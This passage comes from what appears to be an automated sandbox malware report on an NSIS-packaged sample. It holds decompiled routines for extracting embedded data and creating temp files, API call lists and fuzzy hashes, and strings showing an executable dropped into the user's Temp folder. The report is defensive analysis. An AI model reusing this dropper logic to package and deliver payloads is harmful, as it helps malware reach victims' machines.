                    							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
                    							_t91 = _v16;
                    							 *0x7a8ab4 =  *0x79f730;
                    							if(_t91 > _t107) {
                    								goto L30;
                    							}
                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                    								_v12 = _v12 + 1;
                    								_t107 = _t91 - 4;
                    								if(_t104 > _t107) {
                    									_t104 = _t107;
                    								}
                    								goto L19;
                    							} else {
                    								goto L22;
                    							}
                    						}
                    						L19:
                    						if(_t107 <  *0x79f740) {
                    							_v8 = E00406B28(_v8, 0x797730, _t104);
                    						}
                    						 *0x79f730 =  *0x79f730 + _t104;
                    						_t107 = _t107 - _t104;
                    					} while (_t107 != 0);
                    					goto L22;
                    				}
                    			}





























                    APIs
                    • GetTickCount.KERNEL32 ref: 004030E4
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\inlaww321345.exe,00000400), ref: 00403100
                      • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00406162
                      • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                    • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,007B4800,007B4800,C:\Users\user\Desktop\inlaww321345.exe,C:\Users\user\Desktop\inlaww321345.exe,80000000,00000003), ref: 00403149
                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\inlaww321345.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                    • API String ID: 2803837635-546436955
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph: function at 0x0040176F (graph image not preserved; legend: executed / not executed)
                    C-Code - Quality: 77%
                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                    				void* __esi;
                    				void* _t35;
                    				void* _t43;
                    				void* _t45;
                    				FILETIME* _t51;
                    				FILETIME* _t64;
                    				void* _t66;
                    				signed int _t72;
                    				FILETIME* _t73;
                    				FILETIME* _t77;
                    				signed int _t79;
                    				WCHAR* _t81;
                    				void* _t83;
                    				void* _t84;
                    				void* _t86;
                    
                    				_t77 = __ebx;
                    				 *(_t86 - 8) = E00402DA6(0x31);
                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                    				_t35 = E00405FB4( *(_t86 - 8));
                    				_push( *(_t86 - 8));
                    				_t81 = L"C:\\U";
                    				if(_t35 == 0) {
                    					lstrcatW(E00405F3D(E0040666E(_t81, 0x7b4000)), ??);
                    				} else {
                    					E0040666E();
                    				}
                    				E004068F5(_t81);
                    				while(1) {
                    					__eflags =  *(_t86 + 8) - 3;
                    					if( *(_t86 + 8) >= 3) {
                    						_t66 = E004069A4(_t81);
                    						_t79 = 0;
                    						__eflags = _t66 - _t77;
                    						if(_t66 != _t77) {
                    							_t73 = _t66 + 0x14;
                    							__eflags = _t73;
                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                    						}
                    						asm("sbb eax, eax");
                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                    						__eflags = _t72;
                    						 *(_t86 + 8) = _t72;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) == _t77) {
                    						E00406139(_t81);
                    					}
                    					__eflags =  *(_t86 + 8) - 1;
                    					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                    					__eflags = _t43 - 0xffffffff;
                    					 *(_t86 - 0x38) = _t43;
                    					if(_t43 != 0xffffffff) {
                    						break;
                    					}
                    					__eflags =  *(_t86 + 8) - _t77;
                    					if( *(_t86 + 8) != _t77) {
                    						E004056D0(0xffffffe2,  *(_t86 - 8));
                    						__eflags =  *(_t86 + 8) - 2;
                    						if(__eflags == 0) {
                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                    						}
                    						L31:
                    						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
                    						__eflags =  *0x7a8b28;
                    						goto L32;
                    					} else {
                    						E0040666E(0x40b5f8, _t83);
                    						E0040666E(_t83, _t81);
                    						E004066AB(_t77, _t81, _t83, "C:\Users\hardz\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                    						E0040666E(_t83, 0x40b5f8);
                    						_t64 = E00405CCE("C:\Users\hardz\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                    						__eflags = _t64;
                    						if(_t64 == 0) {
                    							continue;
                    						} else {
                    							__eflags = _t64 == 1;
                    							if(_t64 == 1) {
                    								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
                    								L32:
                    								_t51 = 0;
                    								__eflags = 0;
                    							} else {
                    								_push(_t81);
                    								_push(0xfffffffa);
                    								E004056D0();
                    								L29:
                    								_t51 = 0x7fffffff;
                    							}
                    						}
                    					}
                    					L33:
                    					return _t51;
                    				}
                    				E004056D0(0xffffffea,  *(_t86 - 8));
                    				 *0x7a8b54 =  *0x7a8b54 + 1;
                    				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                    				 *0x7a8b54 =  *0x7a8b54 - 1;
                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                    				_t84 = _t45;
                    				if( *(_t86 - 0x24) != 0xffffffff) {
                    					L22:
                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                    				} else {
                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                    						goto L22;
                    					}
                    				}
                    				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                    				__eflags = _t84 - _t77;
                    				if(_t84 >= _t77) {
                    					goto L31;
                    				} else {
                    					__eflags = _t84 - 0xfffffffe;
                    					if(_t84 != 0xfffffffe) {
                    						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
                    					} else {
                    						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
                    						lstrcatW(_t81,  *(_t86 - 8));
                    					}
                    					_push(0x200010);
                    					_push(_t81);
                    					E00405CCE();
                    					goto L29;
                    				}
                    				goto L33;
                    			}



















                    APIs
                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                    • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,00000000,00000000,C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk,007B4000,?,?,00000031), ref: 004017D5
                      • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                      • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                      • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                      • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                      • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                    • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe C:\Users\user\AppData\Local\Temp\naxsk
                    • API String ID: 1941528284-2435374271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 520 4069cb-4069eb GetSystemDirectoryW 521 4069ed 520->521 522 4069ef-4069f1 520->522 521->522 523 406a02-406a04 522->523 524 4069f3-4069fc 522->524 526 406a05-406a38 wsprintfW LoadLibraryExW 523->526 524->523 525 4069fe-406a00 524->525 525->526
                    C-Code - Quality: 100%
                    			E004069CB(intOrPtr _a4) {
                    				short _v576;
                    				signed int _t13;
                    				struct HINSTANCE__* _t17;
                    				signed int _t19;
                    				void* _t24;
                    
                    				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                    				if(_t13 > 0x104) {
                    					_t13 = 0;
                    				}
                    				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                    					_t19 = 1;
                    				} else {
                    					_t19 = 0;
                    				}
                    				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                    				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                    				return _t17;
                    			}









                    APIs
                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069E2
                    • wsprintfW.USER32 ref: 00406A1D
                    • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406A31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: DirectoryLibraryLoadSystemwsprintf
                    • String ID: %s%S.dll$UXTHEME$\
                    • API String ID: 2200240437-1946221925
                    • Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction ID: edb644a17e19fa0d5d66c6da3b257654e99a3b388903ea93700411201bdfbebd
                    • Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
                    • Instruction Fuzzy Hash: 37F0F671600219A7DB14BB64DD0EF9B376CAB00304F11447AA646F10D0FB7CDB68CB98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 527 405b9f-405bea CreateDirectoryW 528 405bf0-405bfd GetLastError 527->528 529 405bec-405bee 527->529 530 405c17-405c19 528->530 531 405bff-405c13 SetFileSecurityW 528->531 529->530 531->529 532 405c15 GetLastError 531->532 532->530
                    C-Code - Quality: 100%
                    			E00405B9F(WCHAR* _a4) {
                    				struct _SECURITY_ATTRIBUTES _v16;
                    				struct _SECURITY_DESCRIPTOR _v36;
                    				int _t22;
                    				long _t23;
                    
                    				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                    				_v36.Owner = 0x4083f8;
                    				_v36.Group = 0x4083f8;
                    				_v36.Sacl = _v36.Sacl & 0x00000000;
                    				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                    				_v16.lpSecurityDescriptor =  &_v36;
                    				_v36.Revision = 1;
                    				_v36.Control = 4;
                    				_v36.Dacl = 0x4083e8;
                    				_v16.nLength = 0xc;
                    				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
                    				if(_t22 != 0) {
                    					L1:
                    					return 0;
                    				}
                    				_t23 = GetLastError();
                    				if(_t23 == 0xb7) {
                    					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
                    						goto L1;
                    					}
                    					return GetLastError();
                    				}
                    				return _t23;
                    			}








                    APIs
                    • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                    • GetLastError.KERNEL32 ref: 00405BF6
                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405C0B
                    • GetLastError.KERNEL32 ref: 00405C15
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BC5
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                    • String ID: C:\Users\user\AppData\Local\Temp\
                    • API String ID: 3449924974-3916508600
                    • Opcode ID: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction ID: a4b5b825bdd4266eac6b0ee8a32438dce20ed58698919e53373cd8165130f89a
                    • Opcode Fuzzy Hash: 4d8c721838b8a92ea27708fe49d100345a2f80ebd1be40878b53e15a1b169c58
                    • Instruction Fuzzy Hash: 31010871D04219EAEF009BA0C944BEFBFB8EF04314F00403AD545B6191E7799A48CF99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 533 40347f-4034a7 GetTickCount 534 4035d7-4035df call 40302e 533->534 535 4034ad-4034d8 call 4035fe SetFilePointer 533->535 540 4035e1-4035e5 534->540 541 4034dd-4034ef 535->541 542 4034f1 541->542 543 4034f3-403501 call 4035e8 541->543 542->543 546 403507-403513 543->546 547 4035c9-4035cc 543->547 548 403519-40351f 546->548 547->540 549 403521-403527 548->549 550 40354a-403566 call 406b96 548->550 549->550 551 403529-403549 call 40302e 549->551 556 4035d2 550->556 557 403568-403570 550->557 551->550 558 4035d4-4035d5 556->558 559 403572-40357a call 406210 557->559 560 403593-403599 557->560 558->540 564 40357f-403581 559->564 560->556 561 40359b-40359d 560->561 561->556 563 40359f-4035b2 561->563 563->541 565 4035b8-4035c7 SetFilePointer 563->565 566 403583-40358f 564->566 567 4035ce-4035d0 564->567 565->534 566->548 568 403591 566->568 567->558 568->563
                    C-Code - Quality: 93%
                    			E0040347F(intOrPtr _a4) {
                    				intOrPtr _t11;
                    				signed int _t12;
                    				void* _t15;
                    				long _t16;
                    				void* _t18;
                    				intOrPtr _t30;
                    				intOrPtr _t33;
                    				intOrPtr _t35;
                    				void* _t36;
                    				intOrPtr _t48;
                    
                    				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
                    				 *0x7a8aac = GetTickCount() + 0x1f4;
                    				if(_t33 <= 0) {
                    					L22:
                    					E0040302E(1);
                    					return 0;
                    				}
                    				E004035FE( *0x79f744);
                    				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                    				 *0x79f740 = _t33;
                    				 *0x79f730 = 0;
                    				while(1) {
                    					_t30 = 0x4000;
                    					_t11 =  *0x79f738 -  *0x79f744;
                    					if(_t11 <= 0x4000) {
                    						_t30 = _t11;
                    					}
                    					_t12 = E004035E8(0x793730, _t30);
                    					if(_t12 == 0) {
                    						break;
                    					}
                    					 *0x79f744 =  *0x79f744 + _t30;
                    					 *0x40ce68 = 0x793730;
                    					 *0x40ce6c = _t30;
                    					L6:
                    					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
                    						 *0x79f730 =  *0x79f740 -  *0x79f734 - _a4 +  *0x40ce60;
                    						E0040302E(0);
                    					}
                    					 *0x40ce70 = 0x78b730;
                    					 *0x40ce74 = 0x8000;
                    					if(E00406B96(0x40ce68) < 0) {
                    						goto L20;
                    					}
                    					_t35 =  *0x40ce70; // 0x790349
                    					_t36 = _t35 - 0x78b730;
                    					if(_t36 == 0) {
                    						__eflags =  *0x40ce6c; // 0x0
                    						if(__eflags != 0) {
                    							goto L20;
                    						}
                    						__eflags = _t30;
                    						if(_t30 == 0) {
                    							goto L20;
                    						}
                    						L16:
                    						_t16 =  *0x79f734;
                    						if(_t16 -  *0x40ce60 + _a4 > 0) {
                    							continue;
                    						}
                    						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                    						goto L22;
                    					}
                    					_t18 = E00406210( *0x40a01c, 0x78b730, _t36); // executed
                    					if(_t18 == 0) {
                    						_push(0xfffffffe);
                    						L21:
                    						_pop(_t15);
                    						return _t15;
                    					}
                    					 *0x40ce60 =  *0x40ce60 + _t36;
                    					_t48 =  *0x40ce6c; // 0x0
                    					if(_t48 != 0) {
                    						goto L6;
                    					}
                    					goto L16;
                    					L20:
                    					_push(0xfffffffd);
                    					goto L21;
                    				}
                    				return _t12 | 0xffffffff;
                    			}














                    APIs
                    • GetTickCount.KERNEL32 ref: 00403493
                      • Part of subcall function 004035FE: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
                    • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 004034C6
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,0040CE68,00793730,00004000,?,00000000,004033A9,00000004,00000000,00000000,?,?,00403323,000000FF), ref: 004035C1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer$CountTick
                    • String ID: 07y
                    • API String ID: 1092082344-1660179758
                    • Opcode ID: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                    • Instruction ID: fa4fce997e9b0d1f670701ff0d5ea0446f36afc43afd7a1273bf0b0fb6409833
                    • Opcode Fuzzy Hash: 5ef9f3cf75525ab0b28f5e9a18968e2fb4815e048a68f3a4626f05087b93d5e0
                    • Instruction Fuzzy Hash: 6E31AEB2510215EFCB209F69FE8492A3BADF74475A714423BE401B22F0DB795D02CB9D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 569 40618d-406199 570 40619a-4061ce GetTickCount GetTempFileNameW 569->570 571 4061d0-4061d2 570->571 572 4061dd-4061df 570->572 571->570 573 4061d4 571->573 574 4061d7-4061da 572->574 573->574
                    C-Code - Quality: 100%
                    			E0040618D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				intOrPtr _v8;
                    				short _v12;
                    				short _t12;
                    				intOrPtr _t13;
                    				signed int _t14;
                    				WCHAR* _t17;
                    				signed int _t19;
                    				signed short _t23;
                    				WCHAR* _t26;
                    
                    				_t26 = _a4;
                    				_t23 = 0x64;
                    				while(1) {
                    					_t12 =  *L"nsa"; // 0x73006e
                    					_t23 = _t23 - 1;
                    					_v12 = _t12;
                    					_t13 =  *0x40a5ac; // 0x61
                    					_v8 = _t13;
                    					_t14 = GetTickCount();
                    					_t19 = 0x1a;
                    					_v8 = _v8 + _t14 % _t19;
                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                    					if(_t17 != 0) {
                    						break;
                    					}
                    					if(_t23 != 0) {
                    						continue;
                    					} else {
                    						 *_t26 =  *_t26 & _t23;
                    					}
                    					L4:
                    					return _t17;
                    				}
                    				_t17 = _t26;
                    				goto L4;
                    			}













                    APIs
                    • GetTickCount.KERNEL32 ref: 004061AB
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403644,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 004061C6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-1968954121
                    • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                    • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                    • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
                    C-Code - Quality: 100%
                    			E00403C2B() {
                    				void* _t1;
                    				void* _t2;
                    				void* _t4;
                    				signed int _t11;
                    
                    				_t1 =  *0x40a018; // 0xffffffff
                    				if(_t1 != 0xffffffff) {
                    					CloseHandle(_t1);
                    					 *0x40a018 =  *0x40a018 | 0xffffffff;
                    				}
                    				_t2 =  *0x40a01c; // 0xffffffff
                    				if(_t2 != 0xffffffff) {
                    					CloseHandle(_t2);
                    					 *0x40a01c =  *0x40a01c | 0xffffffff;
                    					_t11 =  *0x40a01c;
                    				}
                    				E00403C88();
                    				_t4 = E00405D7A(_t11, L"C:\\Users\\hardz\\AppData\\Local\\Temp\\nszD9B9.tmp\\", 7); // executed
                    				return _t4;
                    			}








                    APIs
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                    • C:\Users\user\AppData\Local\Temp\nszD9B9.tmp\, xrefs: 00403C61
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: CloseHandle
                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nszD9B9.tmp\
                    • API String ID: 2962429428-554133099
                    • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                    • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                    • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                    • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
                    C-Code - Quality: 92%
                    			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                    				long _v8;
                    				long _t21;
                    				long _t22;
                    				void* _t24;
                    				long _t26;
                    				int _t27;
                    				long _t28;
                    				void* _t30;
                    				long _t31;
                    				long _t32;
                    				long _t36;
                    
                    				_t21 = _a4;
                    				if(_t21 >= 0) {
                    					_t32 = _t21 +  *0x7a8af8;
                    					 *0x79f734 = _t32;
                    					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                    				}
                    				_t22 = E0040347F(4);
                    				if(_t22 >= 0) {
                    					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
                    					if(_t24 == 0) {
                    						L18:
                    						_push(0xfffffffd);
                    						goto L19;
                    					} else {
                    						 *0x79f734 =  *0x79f734 + 4;
                    						_t36 = E0040347F(_a4);
                    						if(_t36 < 0) {
                    							L21:
                    							_t22 = _t36;
                    						} else {
                    							if(_a12 != 0) {
                    								_t26 = _a4;
                    								if(_t26 >= _a16) {
                    									_t26 = _a16;
                    								}
                    								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                    								if(_t27 != 0) {
                    									_t36 = _v8;
                    									 *0x79f734 =  *0x79f734 + _t36;
                    									goto L21;
                    								} else {
                    									goto L18;
                    								}
                    							} else {
                    								if(_a4 <= 0) {
                    									goto L21;
                    								} else {
                    									while(1) {
                    										_t28 = _a4;
                    										if(_a4 >= 0x4000) {
                    											_t28 = 0x4000;
                    										}
                    										_v8 = _t28;
                    										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
                    											goto L18;
                    										}
                    										_t30 = E00406210(_a8, 0x793730, _v8); // executed
                    										if(_t30 == 0) {
                    											_push(0xfffffffe);
                    											L19:
                    											_pop(_t22);
                    										} else {
                    											_t31 = _v8;
                    											_a4 = _a4 - _t31;
                    											 *0x79f734 =  *0x79f734 + _t31;
                    											_t36 = _t36 + _t31;
                    											if(_a4 > 0) {
                    												continue;
                    											} else {
                    												goto L21;
                    											}
                    										}
                    										goto L22;
                    									}
                    									goto L18;
                    								}
                    							}
                    						}
                    					}
                    				}
                    				L22:
                    				return _t22;
                    			}















                    APIs
                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.260738972.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.260734428.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260747957.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260784814.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.260791797.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261016633.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261025813.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261032739.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261037968.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261051766.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261058159.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261063898.00000000007B5000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.261068161.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_inlaww321345.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID: 07y
                    • API String ID: 973152223-1660179758
                    • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                    • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                    • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                    • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 617 405d32-405d43 call 406139 620 405d73 617->620 621 405d45-405d4b 617->621 624 405d75-405d77 620->624 622 405d55 DeleteFileW 621->622 623 405d4d-405d53 RemoveDirectoryW 621->623 625 405d5b-405d5d 622->625 623->625 626 405d64-405d69 625->626 627 405d5f-405d62 625->627 626->620 628 405d6b-405d6d SetFileAttributesW 626->628 627->624 628->620
                    C-Code - Quality: 41%
                    			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
                    				int _t9;
                    				long _t13;
                    				WCHAR* _t14;
                    
                    				_t14 = _a4;
                    				_t13 = E00406139(_t14);
                    				if(_t13 == 0xffffffff) {
                    					L8:
                    					return 0;
                    				}
                    				_push(_t14);
                    				if((_a8 & 0x00000001) == 0) {
